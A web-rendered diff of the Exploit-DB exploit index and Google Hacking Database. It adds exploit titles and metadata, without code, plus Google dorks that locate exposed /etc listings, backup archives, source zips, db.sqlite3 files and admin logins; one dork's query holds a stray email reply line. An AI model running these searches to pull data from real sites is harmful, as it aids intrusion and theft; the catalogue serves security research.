49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,, 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,,
51387,exploits/php/webapps/51387.txt,"ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip, 45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip,
50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,, 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,,
11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip, 11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip,
@ -29045,6 +29056,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80,2019-01-18,2019-01-18,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comseotoasterv3.0.0.zip, 46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80,2019-01-18,2019-01-18,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comseotoasterv3.0.0.zip,
5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,, 5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,,
18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip, 18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip,
51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
@ -34708,6 +34721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,, 4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,,
51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,, 51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,,
51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,,
51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,, 51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,,
19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info 19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info
698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,, 698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,,
@ -39153,6 +39167,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows,,2017-01-12,2017-01-12,0,,,,,http://www.exploit-db.comaScTimeTables.exe, 41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows,,2017-01-12,2017-01-12,0,,,,,http://www.exploit-db.comaScTimeTables.exe,
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,,2020-12-02,2020-12-02,0,,,,,, 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,,2020-12-02,2020-12-02,0,,,,,,
40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,, 40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,,
51380,exploits/windows/local/51380.txt,"AspEmail v5.6.0.2 - Local Privilege Escalation",2023-04-20,Zer0FauLT,local,windows,,2023-04-20,2023-04-20,0,,,,,,
31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows,,2014-02-06,2014-02-06,0,OSVDB-103048,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php 31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows,,2014-02-06,2014-02-06,0,OSVDB-103048,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php
16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows,,2010-09-20,2011-03-10,1,CVE-2006-6665;OSVDB-32356,"Metasploit Framework (MSF)",,,, 16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows,,2010-09-20,2011-03-10,1,CVE-2006-6665;OSVDB-32356,"Metasploit Framework (MSF)",,,,
2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,, 2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,,
@ -39710,6 +39725,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,CVE-2009-0546;OSVDB-51753,"Metasploit Framework (MSF)",,,, 16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,CVE-2009-0546;OSVDB-51753,"Metasploit Framework (MSF)",,,,
11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows,,2010-02-08,,1,OSVDB-51753;CVE-2009-0546,,,,http://www.exploit-db.comFeedDemonInstall.exe, 11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows,,2010-02-08,,1,OSVDB-51753;CVE-2009-0546,,,,http://www.exploit-db.comFeedDemonInstall.exe,
14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows,,2010-06-25,2010-11-12,1,,,,,,http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows,,2010-06-25,2010-11-12,1,,,,,,http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053
51375,exploits/windows/local/51375.txt,"File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control",2023-04-20,"Andrea Intilangelo",local,windows,,2023-04-20,2023-04-20,0,CVE-2023-26918,,,,,
50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,, 50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows,,2012-10-11,2012-10-11,0,OSVDB-86254,,,,,http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf 21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows,,2012-10-11,2012-10-11,0,OSVDB-86254,,,,,http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf
35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows,,2014-10-28,2014-10-28,0,CVE-2014-8347;OSVDB-113845,,,,, 35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows,,2014-10-28,2014-10-28,0,CVE-2014-8347;OSVDB-113845,,,,,

Can't render this file because it is too large.

120
ghdb.xml
View file

@ -37610,6 +37610,21 @@ stag_1</textualDescription>
<date>2021-07-21</date> <date>2021-07-21</date>
<author>Osman Arif</author> <author>Osman Arif</author>
</entry> </entry>
<entry>
<id>8162</id>
<link>https://www.exploit-db.com/ghdb/8162</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of&quot; intext:&quot;source_code.zip</shortDescription>
<textualDescription># Google Dork: Index of&quot; intext:&quot;source_code.zip
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>Index of&quot; intext:&quot;source_code.zip</query>
<querystring>https://www.google.com/search?q=Index of&quot; intext:&quot;source_code.zip</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry> <entry>
<id>7638</id> <id>7638</id>
<link>https://www.exploit-db.com/ghdb/7638</link> <link>https://www.exploit-db.com/ghdb/7638</link>
@ -38679,6 +38694,66 @@ misconfigured servers.
<date>2023-04-06</date> <date>2023-04-06</date>
<author>Monirul Islam</author> <author>Monirul Islam</author>
</entry> </entry>
<entry>
<id>8166</id>
<link>https://www.exploit-db.com/ghdb/8166</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;/etc&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;/etc&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;/etc&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;/etc&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8163</id>
<link>https://www.exploit-db.com/ghdb/8163</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;backend/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;backend/&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;backend/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;backend/&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8161</id>
<link>https://www.exploit-db.com/ghdb/8161</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8165</id>
<link>https://www.exploit-db.com/ghdb/8165</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry> <entry>
<id>7717</id> <id>7717</id>
<link>https://www.exploit-db.com/ghdb/7717</link> <link>https://www.exploit-db.com/ghdb/7717</link>
@ -38694,6 +38769,21 @@ misconfigured servers.
<date>2021-11-09</date> <date>2021-11-09</date>
<author>Parth Surati</author> <author>Parth Surati</author>
</entry> </entry>
<entry>
<id>8164</id>
<link>https://www.exploit-db.com/ghdb/8164</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;plugin/&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry> <entry>
<id>7683</id> <id>7683</id>
<link>https://www.exploit-db.com/ghdb/7683</link> <link>https://www.exploit-db.com/ghdb/7683</link>
@ -47987,6 +48077,21 @@ Author: Abhinav Porwal
<date>2021-10-27</date> <date>2021-10-27</date>
<author>MD. Rimel</author> <author>MD. Rimel</author>
</entry> </entry>
<entry>
<id>8167</id>
<link>https://www.exploit-db.com/ghdb/8167</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of db.sqlite3</shortDescription>
<textualDescription># Google Dork: intitle:index of db.sqlite3
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: Shebu</textualDescription>
<query>Re: Thank you for your submission! Re: intitle:index of db.sqlite3</query>
<querystring>https://www.google.com/search?q=Re: Thank you for your submission! Re: intitle:index of db.sqlite3</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>Shebu</author>
</entry>
<entry> <entry>
<id>7368</id> <id>7368</id>
<link>https://www.exploit-db.com/ghdb/7368</link> <link>https://www.exploit-db.com/ghdb/7368</link>
@ -78027,6 +78132,21 @@ https://ch.linkedin.com/in/schmidbruno
<date>2021-11-15</date> <date>2021-11-15</date>
<author>Arindam Saha</author> <author>Arindam Saha</author>
</entry> </entry>
<entry>
<id>8168</id>
<link>https://www.exploit-db.com/ghdb/8168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;
# Pages Containing Login Portals
# Date:20/04/2023
# Exploit Author: Bhavin Amesara</textualDescription>
<query>inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>Bhavin Amesara</author>
</entry>
<entry> <entry>
<id>7387</id> <id>7387</id>
<link>https://www.exploit-db.com/ghdb/7387</link> <link>https://www.exploit-db.com/ghdb/7387</link>